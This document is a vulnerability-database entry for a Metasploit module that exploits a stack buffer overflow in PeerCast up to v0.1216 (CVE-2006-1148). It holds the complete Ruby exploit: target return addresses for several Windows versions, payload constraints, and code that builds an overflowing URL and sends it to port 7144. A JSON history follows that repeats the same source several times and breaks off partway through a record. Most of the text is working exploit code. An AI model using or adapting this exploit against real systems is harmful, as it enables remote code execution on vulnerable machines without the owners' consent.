ID MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'PeerCast URL Handling Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in PeerCast <= v0.1216.
The vulnerability is caused due to a boundary error within the
handling of URL parameters.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2006-1148'],
['OSVDB', '23777'],
['BID', '17040']
],
'Privileged' => false,
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],
['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],
['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],
['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],
],
'DisclosureDate' => 'Mar 8 2006'))
register_options( [ Opt::RPORT(7144) ])
end
def exploit
connect
pat = rand_text_alphanumeric(1024)
pat[768, 4] = [target.ret].pack('V')
pat[812, 5] = [0xe9, -517].pack('CV')
pat[300, payload.encoded.length] = payload.encoded
uri = '/stream/?' + pat
res = "GET #{uri} HTTP/1.0\r\n\r\n"
print_status("Trying target address 0x%.8x..." % target.ret)
sock.put(res)
sock.close
handler
disconnect
end
end
{"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "hash": "4a775fe4d8c2c232f2afa5704f6c0153", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-08-27T03:36:34", "history": [{"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-05-03T20:42:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.rapid7.com/db/modules/exploit/windows/http/peercast_url", "reporter": "Rapid7", "references": ["#", "http://www.securityfocus.com/bid/17040", "http://cvedetails.com/cve/cve-2006-1148"], "cvelist": ["CVE-2006-1148"], "lastseen": "2017-07-02T23:17:17", "history": [], "viewCount": 1, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\n\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2017-07-02T23:17:17", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.rapid7.com/db/modules/exploit/windows/http/peercast_url", "reporter": "Rapid7", "references": ["#", "http://www.securityfocus.com/bid/17040", "http://cvedetails.com/cve/cve-2006-1148"], "cvelist": ["CVE-2006-1148"], "lastseen": "2017-07-24T19:42:55", "history": [], "viewCount": 1, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2017-07-24T19:42:55", "differentElements": ["href", "references"], "edition": 2}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2017-08-21T15:31:45", "history": [], "viewCount": 1, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2017-08-21T15:31:45", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2017-11-02T09:42:18", "history": [], "viewCount": 1, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2017-11-02T09:42:18", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2017-11-02T13:39:34", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.2, "modified": "2017-11-02T13:39:34"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2017-11-02T13:39:34", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2017-12-30T04:06:55", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.2, "modified": "2017-12-30T04:06:55"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2017-12-30T04:06:55", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2017-12-30T15:59:53", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.2, "modified": "2017-12-30T15:59:53"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2017-12-30T15:59:53", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-01-09T22:05:33", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.2, "modified": "2018-01-09T22:05:33"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-01-09T22:05:33", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-01-10T00:02:03", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.2, "modified": "2018-01-10T00:02:03"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-01-10T00:02:03", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-01-14T22:10:23", "history": [], "viewCount": 1, "enchantments": {"score": {"value": null, "modified": "2018-01-14T22:10:23"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 